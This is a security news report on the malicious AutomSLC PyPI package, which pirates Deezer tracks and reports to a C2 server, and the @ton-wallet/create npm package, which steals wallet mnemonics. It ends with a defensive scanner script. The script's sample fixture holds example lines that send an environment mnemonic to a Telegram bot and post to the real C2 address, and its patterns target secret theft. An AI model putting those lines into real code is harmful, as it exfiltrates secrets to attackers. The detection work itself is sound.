
Cybersecurity researchers have flagged a malicious Python library in the Python Package Index (PyPI) repository that facilitates unauthorized music downloads from the music streaming service Deezer.
The package in question is AutomSLC, which has been downloaded more than 104,000 times to date. It was first published in May 2019 and is still available on PyPI as of this writing.
"AutomSLC, which has been downloaded more than 100,000 times, is intended to provide music automation and metadata search, but also embeds hardcoded credentials and communicates with external command-and-control (C2) servers, covertly bypassing Deezer's access restrictions," Kirill Boychenko said in a report released today.

Specifically, the package is designed to let users log in to the French music streaming platform with hardcoded credentials, collect track-related metadata, and download audio files, in complete violation of Deezer's API terms.
The package also "regularly communicates with a remote server located at 54.39.49[.]17:8031" to report up-to-date download status, thereby centralizing the threat actors' control over a coordinated music piracy operation.
Put another way, AutomSLC effectively turns the systems of its users into nodes of an illegal distribution network, facilitating bulk music downloads in an unauthorized manner. The IP address is associated with a domain named automusic[.]win, which the threat actors are said to use to oversee the distributed download operation.

"Deezer's API terms prohibit local or offline storage of full audio content, but by downloading and decrypting entire tracks, AutomSLC bypasses this limit and could put users at legal risk," Boychenko said.
The disclosure comes as the software supply chain security company also detailed a malicious npm package named @ton-wallet/create that spoofs the legitimate @ton/ton package while stealing mnemonic phrases from unsuspecting users and developers.
First published to the npm registry in August 2024, the package has accumulated 584 downloads to date and is still available for download.

The malicious functionality embedded in the library extracts the mnemonic phrase from the process environment variables (process.env). That phrase can give threat actors full access to a victim's cryptocurrency wallet and potentially let them drain the victim's digital assets. The information is sent to an attacker-controlled Telegram bot.
"This attack poses serious supply chain security risks and targets developers and users who integrate it into their applications," Socket said. "Periodic dependency audits and automated scanning tools should be adopted to detect abnormal or malicious behavior in third-party packages before they are integrated into a production environment."
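The audit recommendation above can be made concrete with a small static scanner. The following is an added example written for this article, not Socket's tooling and not code from either package: it walks a package's source files and flags the behaviours the article describes (a hardcoded IP:port C2 endpoint, Telegram Bot API calls, reads of a mnemonic from the process environment, and credential-looking string constants). The only indicators taken from the article are the C2 address 54.39.49.17 and the domain automusic.win; the sample package contents, file names and rule names are constructed for the demonstration.

```python
import re
from dataclasses import dataclass
from pathlib import Path

# Network indicators published in the article (defanged there as 54.39.49[.]17 and automusic[.]win).
KNOWN_IOCS = ("54.39.49.17", "automusic.win")

# Generic behavioural patterns that a reviewer would want surfaced before a dependency
# reaches production. Rule names are our own; they are not from any published scanner.
PATTERNS = {
    # literal IPv4 address followed by a port, e.g. 203.0.113.5:8031
    "hardcoded_ip_port": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}:\d{2,5}\b"),
    # Telegram Bot API endpoint, commonly used as a cheap exfiltration channel
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    # JavaScript process.env.<...MNEMONIC...> or Python os.environ[...MNEMONIC...] reads
    "env_mnemonic_read": re.compile(
        r"process\.env\.\w*MNEMONIC\w*|os\.environ(?:\.get)?\s*[\[(]\s*['\"]\w*MNEMONIC", re.I),
    # credential-looking assignment with a non-trivial string literal on the right-hand side
    "hardcoded_credential": re.compile(
        r"(password|passwd|secret|token|api_key)\s*[=:]\s*['\"][^'\"]{6,}['\"]", re.I),
}


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    rule: str
    snippet: str


def scan_source(path: str, text: str) -> list[Finding]:
    """Return one Finding per (line, rule) hit in a single source file."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for ioc in KNOWN_IOCS:
            if ioc in line:
                findings.append(Finding(path, line_no, "known_ioc:" + ioc, line.strip()))
        for rule, rx in PATTERNS.items():
            if rx.search(line):
                findings.append(Finding(path, line_no, rule, line.strip()))
    return findings


def scan_package(files: dict[str, str]) -> list[Finding]:
    """Scan an in-memory {relative_path: source} mapping (used for the constructed sample)."""
    out = []
    for path, text in files.items():
        out.extend(scan_source(path, text))
    return out


def scan_tree(root: Path, suffixes=(".py", ".js", ".mjs", ".cjs", ".ts")) -> list[Finding]:
    """Scan an unpacked package directory on disk, e.g. node_modules/<pkg> or site-packages/<pkg>."""
    files = {
        str(p.relative_to(root)): p.read_text(errors="replace")
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix in suffixes
    }
    return scan_package(files)


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count hits per rule so a CI job can fail on any non-zero high-severity bucket."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample package: two files imitating the behaviours described in the article
# and one benign file that must produce no findings. None of this is real package code.
SAMPLE_PACKAGE = {
    "automslc_like/client.py": '''
import requests
C2 = "http://54.39.49.17:8031/status"   # constructed; host:port mirrors the article's C2
USERNAME = "user@example.com"
PASSWORD = "not-a-real-password"
def report(): requests.post(C2, json={"ok": True})
''',
    "ton_like/index.js": '''
const mnemonic = process.env.MNEMONIC;
fetch("https://api.telegram.org/bot123:ABC/sendMessage?text=" + mnemonic);
''',
    "benign/util.py": '''
import os
def home(): return os.environ.get("HOME", "/")
''',
}

if __name__ == "__main__":
    for f in scan_package(SAMPLE_PACKAGE):
        print(f"{f.path}:{f.line_no} [{f.rule}] {f.snippet}")
    print(summarize(scan_package(SAMPLE_PACKAGE)))
```

Point `scan_tree` at an unpacked tarball or wheel before it is installed (for example from `npm pack` or `pip download`), and treat any `known_ioc` or `env_mnemonic_read` hit as a hard block; the `hardcoded_credential` and `hardcoded_ip_port` rules are noisier and are better routed to a human reviewer than used as an automatic gate.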